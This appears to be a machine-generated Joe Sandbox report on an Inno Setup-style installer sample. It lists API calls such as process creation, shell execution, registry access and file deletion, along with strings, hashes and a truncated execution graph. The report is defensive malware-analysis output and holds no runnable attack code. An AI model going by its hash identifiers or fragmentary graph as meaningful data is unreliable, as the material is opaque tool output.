                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveForeground
                                                                                • String ID: Will not restart Windows automatically.
                                                                                • API String ID: 307657957-4169339592
                                                                                • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                APIs
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                Strings
                                                                                • Extracting temporary file: , xrefs: 004763EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileTime$Local
                                                                                • String ID: Extracting temporary file:
                                                                                • API String ID: 791338737-4171118009
                                                                                • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                Strings
                                                                                • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                • API String ID: 0-1974262853
                                                                                • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                Strings
                                                                                • %s\%s_is1, xrefs: 00478F10
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1598650737
                                                                                • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMessageSendShell
                                                                                • String ID: open
                                                                                • API String ID: 812272486-2758837156
                                                                                • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                APIs
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                • String ID: <
                                                                                • API String ID: 893404051-4251816714
                                                                                • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                • String ID: )
                                                                                • API String ID: 2227675388-1084416617
                                                                                • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window
                                                                                • String ID: /INITPROCWND=$%x $@
                                                                                • API String ID: 2353593579-4169826103
                                                                                • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                APIs
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocByteCharFreeMultiWide
                                                                                • String ID: NIL Interface Exception$Unknown Method
                                                                                • API String ID: 3952431833-1023667238
                                                                                • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                  • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorHandleLastProcess
                                                                                • String ID: 0nI
                                                                                • API String ID: 3798668922-794067871
                                                                                • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value$EnumQuery
                                                                                • String ID: Inno Setup: No Icons
                                                                                • API String ID: 1576479698-2016326496
                                                                                • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesErrorFileLast
                                                                                • String ID: T$H
                                                                                • API String ID: 1799206407-488339322
                                                                                • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: T$H
                                                                                • API String ID: 2018770650-488339322
                                                                                • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                APIs
                                                                                • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryErrorLastRemove
                                                                                • String ID: T$H
                                                                                • API String ID: 377330604-488339322
                                                                                • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                APIs
                                                                                  • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73BD0000,00481A2F), ref: 0047D0E2
                                                                                  • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                  • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                Strings
                                                                                • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                • String ID: Detected restart. Removing temporary directory.
                                                                                • API String ID: 1717587489-3199836293
                                                                                • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0
                                                                                • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                Execution Graph

                                                                                Execution Coverage:2.5%
                                                                                Dynamic/Decrypted Code Coverage:84.2%
                                                                                Signature Coverage:6.6%
                                                                                Total number of Nodes:977
                                                                                Total number of Limit Nodes:30
                                                                                execution_graph
61481->61483 61482->61476 61484 2d052da 61483->61484 61484->61471 61485 2d09729 73 API calls 61484->61485 61486 2d05304 61485->61486 61486->61471 61579 2d0bedd 61486->61579 61489 2d09c1d __EH_prolog 61488->61489 61603 2d0c0f2 72 API calls 61489->61603 61491 2d09c3e shared_ptr 61604 2d11100 61491->61604 61493 2d09c55 61494 2d0675c 61493->61494 61610 2d03fb0 68 API calls Mailbox 61493->61610 61494->61439 61494->61440 61496 2d09c61 61611 2d0968f 60 API calls 4 library calls 61496->61611 61499 2d05c17 61498->61499 61500 2d11fbc _malloc 59 API calls 61499->61500 61501 2d05c24 61500->61501 61503 2d11444 61502->61503 61504 2d11459 61502->61504 61846 2d14acb 59 API calls __getptd_noexit 61503->61846 61504->61503 61506 2d11460 61504->61506 61848 2d14cc0 82 API calls 12 library calls 61506->61848 61508 2d11449 61847 2d13b65 9 API calls __fclose_nolock 61508->61847 61509 2d11486 61511 2d068a0 61509->61511 61849 2d14b71 79 API calls 6 library calls 61509->61849 61513 2d01ba7 61511->61513 61850 2d22a10 61513->61850 61515 2d01bb1 RtlEnterCriticalSection 61516 2d01bd1 61515->61516 61517 2d01be9 RtlLeaveCriticalSection 61515->61517 61516->61517 61519 2d01c55 RtlLeaveCriticalSection 61516->61519 61851 2d0d334 61517->61851 61519->61394 61520 2d01c22 61520->61519 61523 2d0fb20 Mailbox 68 API calls 61522->61523 61524 2d03c7e 61523->61524 61914 2d03ca2 61524->61914 61529 2d03d7e 61530 2d03d99 htons 61529->61530 61531 2d03dcb htons 61529->61531 61943 2d03bd3 60 API calls 2 library calls 61530->61943 61944 2d03c16 60 API calls 2 library calls 61531->61944 61534 2d03ded 61536 2d0733f 61534->61536 61535 2d03db7 htonl htonl 61535->61534 61537 2d07378 61536->61537 61538 2d07357 61536->61538 61541 2d069e9 61537->61541 61948 2d02ac7 61537->61948 61945 2d08601 61538->61945 61541->61410 61542 2d09729 61541->61542 61543 2d0fb20 Mailbox 68 API calls 61542->61543 61544 2d09743 61543->61544 61545 2d06a2f 61544->61545 62001 2d02db5 61544->62001 61545->61416 61545->61423 61548 2d0fb20 Mailbox 68 API 
